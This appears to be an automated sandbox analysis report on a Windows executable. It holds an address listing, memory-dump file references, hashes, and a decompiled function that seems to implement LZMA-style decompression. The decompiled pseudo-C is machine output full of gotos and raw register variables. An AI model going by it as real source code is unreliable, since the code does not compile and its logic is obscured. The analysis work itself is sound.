                        0x0040691e
                        0x00406924
                        0x0040692b
                        0x00406933
                        0x00406933
                        0x00406936
                        0x00000000
                        0x00406936
                        0x004069a0
                        0x004069ad
                        0x004069b0
                        0x004068bc
                        0x004068bc
                        0x004068bc
                        0x00406058
                        0x00406058
                        0x00406058
                        0x00406061
                        0x00000000
                        0x00000000
                        0x00406067
                        0x00406067
                        0x00000000
                        0x0040606e
                        0x00406072
                        0x00000000
                        0x00000000
                        0x00406078
                        0x0040607b
                        0x0040607e
                        0x00406081
                        0x00406085
                        0x00000000
                        0x00000000
                        0x0040608b
                        0x0040608b
                        0x0040608e
                        0x00406090
                        0x00406091
                        0x00406094
                        0x00406096
                        0x00406097
                        0x00406099
                        0x0040609c
                        0x004060a1
                        0x004060a6
                        0x004060af
                        0x004060c2
                        0x004060c5
                        0x004060d1
                        0x004060f9
                        0x004060fb
                        0x00406109
                        0x00406109
                        0x0040610d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004060fd
                        0x004060fd
                        0x00406100
                        0x00406101
                        0x00406101
                        0x00000000
                        0x004060fd
                        0x004060d3
                        0x004060d7
                        0x004060dc
                        0x004060dc
                        0x004060e5
                        0x004060ed
                        0x004060f0
                        0x00000000
                        0x004060f6
                        0x004060f6
                        0x00000000
                        0x004060f6
                        0x00000000
                        0x00406113
                        0x00406113
                        0x00406117
                        0x004069c3
                        0x004069c3
                        0x00000000
                        0x004069c3
                        0x0040611d
                        0x00406120
                        0x00406130
                        0x00406133
                        0x00406136
                        0x00406136
                        0x00406136
                        0x00406139
                        0x0040613d
                        0x00000000
                        0x00000000
                        0x0040613f
                        0x0040613f
                        0x00406145
                        0x0040616f
                        0x00406175
                        0x0040617c
                        0x00000000
                        0x0040617c
                        0x00406147
                        0x0040614b
                        0x0040614e
                        0x00406153
                        0x00406153
                        0x0040615e
                        0x00406166
                        0x00406169
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004061ae
                        0x004061b4
                        0x004061b7
                        0x004061c4
                        0x004061cc
                        0x00000000
                        0x00000000
                        0x00406183
                        0x00406183
                        0x00406187
                        0x004069d2
                        0x004069d2
                        0x00000000
                        0x004069d2
                        0x0040618d
                        0x00406193
                        0x0040619e
                        0x0040619e
                        0x0040619e
                        0x004061a1
                        0x004061a4
                        0x004061a7
                        0x004061ac
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406843
                        0x00406843
                        0x00406849
                        0x0040684f
                        0x00406855
                        0x0040686f
                        0x00406872
                        0x00406878
                        0x00406883
                        0x00406883
                        0x00406885
                        0x00406857
                        0x00406857
                        0x00406866
                        0x0040686a
                        0x0040686a
                        0x0040688f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406891
                        0x00406895
                        0x00406a44
                        0x00406a44
                        0x00000000
                        0x00406a44
                        0x0040689b
                        0x004068a1
                        0x004068a8
                        0x004068b0
                        0x004068b3
                        0x004068b6
                        0x004068b6
                        0x004068bc
                        0x004068bc
                        0x00000000
                        0x00000000
                        0x004061d4
                        0x004061d4
                        0x004061d6
                        0x004061d9
                        0x0040624a
                        0x0040624a
                        0x0040624d
                        0x00406250
                        0x00406257
                        0x00406261
                        0x00000000
                        0x00406261
                        0x004061db
                        0x004061db
                        0x004061df
                        0x004061e2
                        0x004061e4
                        0x004061e7
                        0x004061ea
                        0x004061ec
                        0x004061ef
                        0x004061f1
                        0x004061f6
                        0x004061f9
                        0x004061fc
                        0x00406200
                        0x00406207
                        0x0040620a
                        0x00406211
                        0x00406215
                        0x0040621d
                        0x0040621d
                        0x0040621d
                        0x00406217
                        0x00406217
                        0x00406217
                        0x0040620c
                        0x0040620c
                        0x0040620c
                        0x00406221
                        0x00406224
                        0x00406242
                        0x00406242
                        0x00406244
                        0x00000000
                        0x00406226
                        0x00406226
                        0x00406226
                        0x00406229
                        0x0040622c
                        0x0040622f
                        0x00406231
                        0x00406231
                        0x00406231
                        0x00406234
                        0x00406237
                        0x00406239
                        0x0040623a
                        0x0040623d
                        0x00000000
                        0x0040623d
                        0x00000000
                        0x00406473
                        0x00406473
                        0x00406477
                        0x00406495
                        0x00406495
                        0x00406498
                        0x0040649f
                        0x004064a2
                        0x004064a5
                        0x004064a8
                        0x004064ab
                        0x004064ae
                        0x004064b0
                        0x004064b7
                        0x004064b8
                        0x004064ba
                        0x004064bd
                        0x004064c0
                        0x004064c3
                        0x004064c3
                        0x004064c8
                        0x00000000
                        0x004064c8
                        0x00406479
                        0x00406479
                        0x0040647c
                        0x0040647f
                        0x00406489
                        0x00000000
                        0x00000000
                        0x004064dd
                        0x004064dd
                        0x004064e1
                        0x00406504
                        0x00406507
                        0x0040650a
                        0x00406514
                        0x004064e3
                        0x004064e3
                        0x004064e6
                        0x004064e9
                        0x004064ec
                        0x004064f9
                        0x004064fc
                        0x004064fc
                        0x00000000
                        0x00000000
                        0x00406520
                        0x00406520
                        0x00406524
                        0x00000000
                        0x00000000
                        0x0040652a
                        0x0040652a
                        0x0040652e
                        0x00000000
                        0x00000000
                        0x00406534
                        0x00406534
                        0x00406536
                        0x0040653a
                        0x0040653a
                        0x0040653d
                        0x00406541
                        0x00000000
                        0x00000000
                        0x00406591
                        0x00406591
                        0x00406595
                        0x0040659c
                        0x0040659c
                        0x0040659f
                        0x004065a2
                        0x004065ac
                        0x00000000
                        0x004065ac
                        0x00406597
                        0x00406597
                        0x00000000
                        0x00000000
                        0x004065b8
                        0x004065b8
                        0x004065bc
                        0x004065c3
                        0x004065c6
                        0x004065c9
                        0x004065be
                        0x004065be
                        0x004065be
                        0x004065cc
                        0x004065cf
                        0x004065d2
                        0x004065d2
                        0x004065d5
                        0x004065d8
                        0x004065db
                        0x004065db
                        0x004065de
                        0x004065e5
                        0x004065ea
                        0x00000000
                        0x00000000
                        0x00406678
                        0x00406678
                        0x0040667c
                        0x00406a1a
                        0x00406a1a
                        0x00000000
                        0x00406a1a
                        0x00406682
                        0x00406682
                        0x00406685
                        0x00406688
                        0x0040668c
                        0x0040668f
                        0x00406695
                        0x00406697
                        0x00406697
                        0x00406697
                        0x0040669a
                        0x0040669d
                        0x00000000
                        0x00000000
                        0x0040626d
                        0x0040626d
                        0x00406271
                        0x004069de
                        0x004069de
                        0x00000000
                        0x004069de
                        0x00406277
                        0x00406277
                        0x0040627a
                        0x0040627d
                        0x00406281
                        0x00406284
                        0x0040628a
                        0x0040628c
                        0x0040628c
                        0x0040628c
                        0x0040628f
                        0x00406292
                        0x00406292
                        0x00406295
                        0x00406298
                        0x00000000
                        0x00000000
                        0x0040629e
                        0x0040629e
                        0x004062a4
                        0x00000000
                        0x00000000
                        0x004062aa
                        0x004062aa
                        0x004062ae
                        0x004062b1
                        0x004062b4
                        0x004062b7
                        0x004062ba
                        0x004062bb
                        0x004062be
                        0x004062c0
                        0x004062c6
                        0x004062c9
                        0x004062cc
                        0x004062cf
                        0x004062d2
                        0x004062d5
                        0x004062d8
                        0x004062f4
                        0x004062f7
                        0x004062fa
                        0x004062fd
                        0x00406304
                        0x00406308
                        0x0040630a
                        0x0040630e
                        0x004062da
                        0x004062da
                        0x004062de
                        0x004062e6
                        0x004062eb
                        0x004062ed
                        0x004062ef
                        0x004062ef
                        0x00406311
                        0x00406318
                        0x0040631b
                        0x00000000
                        0x00406321
                        0x00406321
                        0x00000000
                        0x00406321
                        0x00000000
                        0x00406326
                        0x00406326
                        0x0040632a
                        0x004069ea
                        0x004069ea
                        0x00000000
                        0x004069ea
                        0x00406330
                        0x00406330
                        0x00406333
                        0x00406336
                        0x0040633a
                        0x0040633d
                        0x00406343
                        0x00406345
                        0x00406345
                        0x00406345
                        0x00406348
                        0x0040634b
                        0x0040634b
                        0x0040634b
                        0x00406351
                        0x00000000
                        0x00000000
                        0x00406353
                        0x00406353
                        0x00406356
                        0x00406359
                        0x0040635c
                        0x0040635f
                        0x00406362
                        0x00406365
                        0x00406368
                        0x0040636b
                        0x0040636e
                        0x00406371
                        0x00406389
                        0x0040638c
                        0x0040638f
                        0x00406392
                        0x00406392
                        0x00406395
                        0x00406399
                        0x0040639b
                        0x00406373
                        0x00406373
                        0x0040637b
                        0x00406380
                        0x00406382
                        0x00406384
                        0x00406384
                        0x0040639e
                        0x004063a5
                        0x004063a8
                        0x00000000
                        0x004063aa
                        0x004063aa
                        0x00000000
                        0x004063aa
                        0x004063a8
                        0x004063af
                        0x004063af
                        0x004063af
                        0x004063af
                        0x00000000
                        0x00000000
                        0x004063ea
                        0x004063ea
                        0x004063ee
                        0x004069f6
                        0x004069f6
                        0x00000000
                        0x004069f6
                        0x004063f4
                        0x004063f4
                        0x004063f7
                        0x004063fa
                        0x004063fe
                        0x00406401
                        0x00406407
                        0x00406409
                        0x00406409
                        0x00406409
                        0x0040640c
                        0x0040640f
                        0x0040640f
                        0x00406415
                        0x004063b3
                        0x004063b3
                        0x004063b6
                        0x00000000
                        0x004063b6
                        0x00406417
                        0x00406417
                        0x0040641a
                        0x0040641d
                        0x00406420
                        0x00406423
                        0x00406426
                        0x00406429
                        0x0040642c
                        0x0040642f
                        0x00406432
                        0x00406435
                        0x0040644d
                        0x00406450
                        0x00406453
                        0x00406456
                        0x00406456
                        0x00406459
                        0x0040645d
                        0x0040645f
                        0x00406437
                        0x00406437
                        0x0040643f
                        0x00406444
                        0x00406446
                        0x00406448
                        0x00406448
                        0x00406462
                        0x00406469
                        0x0040646c
                        0x00000000
                        0x0040646e
                        0x0040646e
                        0x00000000
                        0x0040646e
                        0x00000000
                        0x004066fb
                        0x004066fb
                        0x004066ff
                        0x00406a26
                        0x00406a26
                        0x00000000
                        0x00406a26
                        0x00406705
                        0x00406705
                        0x00406708
                        0x0040670b
                        0x0040670f
                        0x00406712
                        0x00406718
                        0x0040671a
                        0x0040671a
                        0x0040671a
                        0x0040671d
                        0x00000000
                        0x00000000
                        0x004064cb
                        0x004064cb
                        0x004064ce
                        0x00000000
                        0x00000000
                        0x0040680a
                        0x0040680a
                        0x0040680e
                        0x00406830
                        0x00406830
                        0x00406833
                        0x0040683d
                        0x00406840
                        0x00406840
                        0x00000000
                        0x00406840
                        0x00406810
                        0x00406810
                        0x00406813
                        0x00406817
                        0x0040681a
                        0x0040681a
                        0x0040681d
                        0x00000000
                        0x00000000
                        0x004068c7
                        0x004068c7
                        0x004068cb
                        0x004068e9
                        0x004068e9
                        0x004068e9
                        0x004068e9
                        0x004068f0
                        0x004068f7
                        0x004068fe
                        0x004068fe
                        0x00406905
                        0x00406908
                        0x0040690f
                        0x00000000
                        0x00406912
                        0x004068cd
                        0x004068cd
                        0x004068d0
                        0x004068d3
                        0x004068d6
                        0x004068dd
                        0x00406821
                        0x00406821
                        0x00406824
                        0x00000000
                        0x00000000
                        0x004069b8
                        0x004069b8
                        0x004069bb
                        0x004068bc
                        0x004068bc
                        0x004068bc
                        0x00000000
                        0x004068c2
                        0x00000000
                        0x004065f2
                        0x004065f2
                        0x004065f4
                        0x004065fb
                        0x004065fc
                        0x004065fe
                        0x00406601
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406905
                        0x00406905
                        0x00406908
                        0x0040690f
                        0x00000000
                        0x00406912
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406637
                        0x00406637
                        0x0040663a
                        0x00406670
                        0x00406670
                        0x004067a0
                        0x004067a0
                        0x004067a0
                        0x004067a0
                        0x004067a3
                        0x004067a3
                        0x004067a6
                        0x004067a8
                        0x00406a32
                        0x00406a32
                        0x00000000
                        0x00406a32
                        0x004067ae
                        0x004067ae
                        0x004067b1
                        0x00000000
                        0x00000000
                        0x004067b7
                        0x004067b7
                        0x004067bb
                        0x004067be
                        0x004067be
                        0x004067be
                        0x00000000
                        0x004067be
                        0x0040663c
                        0x0040663c
                        0x0040663e
                        0x00406640
                        0x00406642
                        0x00406645
                        0x00406646
                        0x00406648
                        0x0040664a
                        0x0040664d
                        0x00406650
                        0x00406666
                        0x00406666
                        0x0040666b
                        0x004066a3
                        0x004066a3
                        0x004066a7
                        0x004066d0
                        0x004066d3
                        0x004066d5
                        0x004066dc
                        0x004066df
                        0x004066e2
                        0x004066e2
                        0x004066e7
                        0x004066e7
                        0x004066e9
                        0x004066ec
                        0x004066f3
                        0x004066f6
                        0x00406723
                        0x00406723
                        0x00406726
                        0x00406729
                        0x0040679d
                        0x0040679d
                        0x0040679d
                        0x0040679d
                        0x00000000
                        0x0040679d
                        0x0040672b
                        0x0040672b
                        0x00406731
                        0x00406734
                        0x00406737
                        0x0040673a
                        0x0040673d
                        0x00406740
                        0x00406743
                        0x00406746
                        0x00406749
                        0x0040674c
                        0x00406765
                        0x00406767
                        0x0040676a
                        0x0040676b
                        0x0040676e
                        0x00406770
                        0x00406773
                        0x00406775
                        0x00406777
                        0x0040677a
                        0x0040677c
                        0x0040677f
                        0x00406783
                        0x00406785
                        0x00406785
                        0x00406786
                        0x00406789
                        0x0040678c
                        0x0040674e
                        0x0040674e
                        0x00406756
                        0x0040675b
                        0x0040675d
                        0x00406760
                        0x00406760
                        0x0040678f
                        0x00406796
                        0x00406720
                        0x00406720
                        0x00406720
                        0x00406720
                        0x00000000
                        0x00406798
                        0x00406798
                        0x00000000
                        0x00406798
                        0x00406796
                        0x004066a9
                        0x004066a9
                        0x004066ac
                        0x004066ae
                        0x004066b1
                        0x004066b4
                        0x004066b7
                        0x004066b9
                        0x004066bc
                        0x004066bf
                        0x004066bf
                        0x004066c2
                        0x004066c2
                        0x004066c5
                        0x004066cc
                        0x004066a0
                        0x004066a0
                        0x004066a0
                        0x004066a0
                        0x00000000
                        0x004066ce
                        0x004066ce
                        0x00000000
                        0x004066ce
                        0x004066cc
                        0x00406652
                        0x00406652
                        0x00406655
                        0x00406657
                        0x0040665a
                        0x00000000
                        0x00000000
                        0x004063b9
                        0x004063b9
                        0x004063bd
                        0x00406a02
                        0x00406a02
                        0x00000000
                        0x00406a02
                        0x004063c3
                        0x004063c3
                        0x004063c6
                        0x004063c9
                        0x004063cc
                        0x004063cf
                        0x004063d2
                        0x004063d5
                        0x004063d7
                        0x004063da
                        0x004063dd
                        0x004063e0
                        0x004063e2
                        0x004063e2
                        0x004063e2
                        0x00000000
                        0x00000000
                        0x00406544
                        0x00406544
                        0x00406548
                        0x00406a0e
                        0x00406a0e
                        0x00000000
                        0x00406a0e
                        0x0040654e
                        0x0040654e
                        0x00406551
                        0x00406554
                        0x00406557
                        0x00406559
                        0x00406559
                        0x00406559
                        0x0040655c
                        0x0040655f
                        0x00406562
                        0x00406565
                        0x00406568
                        0x0040656b
                        0x0040656c
                        0x0040656e
                        0x0040656e
                        0x0040656e
                        0x00406571
                        0x00406574
                        0x00406577
                        0x0040657a
                        0x0040657a
                        0x0040657a
                        0x0040657d
                        0x0040657f
                        0x0040657f
                        0x00000000
                        0x00000000
                        0x004067c1
                        0x004067c1
                        0x004067c1
                        0x004067c5
                        0x00000000
                        0x00000000
                        0x004067cb
                        0x004067cb
                        0x004067ce
                        0x004067d1
                        0x004067d4
                        0x004067d6
                        0x004067d6
                        0x004067d6
                        0x004067d9
                        0x004067dc
                        0x004067df
                        0x004067e2
                        0x004067e5
                        0x004067e8
                        0x004067e9
                        0x004067eb
                        0x004067eb
                        0x004067eb
                        0x004067ee
                        0x004067f1
                        0x004067f4
                        0x004067f7
                        0x004067fa
                        0x004067fe
                        0x00406800
                        0x00406803
                        0x00000000
                        0x00406805
                        0x00406805
                        0x00406582
                        0x00406582
                        0x00000000
                        0x00406582
                        0x00406803
                        0x00406a38
                        0x00406a38
                        0x00000000
                        0x00000000
                        0x00406067
                        0x00406a6f
                        0x00406a6f
                        0x00000000
                        0x00406a6f
                        0x004068bc
                        0x0040693c
                        0x00406905

                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                        • Instruction ID: 2446724231f05ea51107c8768389afa7e2a62b3a86e3c0cdb9b17195a5c17046
                        • Opcode Fuzzy Hash: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                        • Instruction Fuzzy Hash: E9A14F71E00228CFDB28CFA8C8547ADBBB1FB45305F21816AD956BB281D7785A96CF44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040680A, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                        Download Yara Rule
                        C-Code - Quality: 98%
                        			E0040680A() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4)); // executed
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
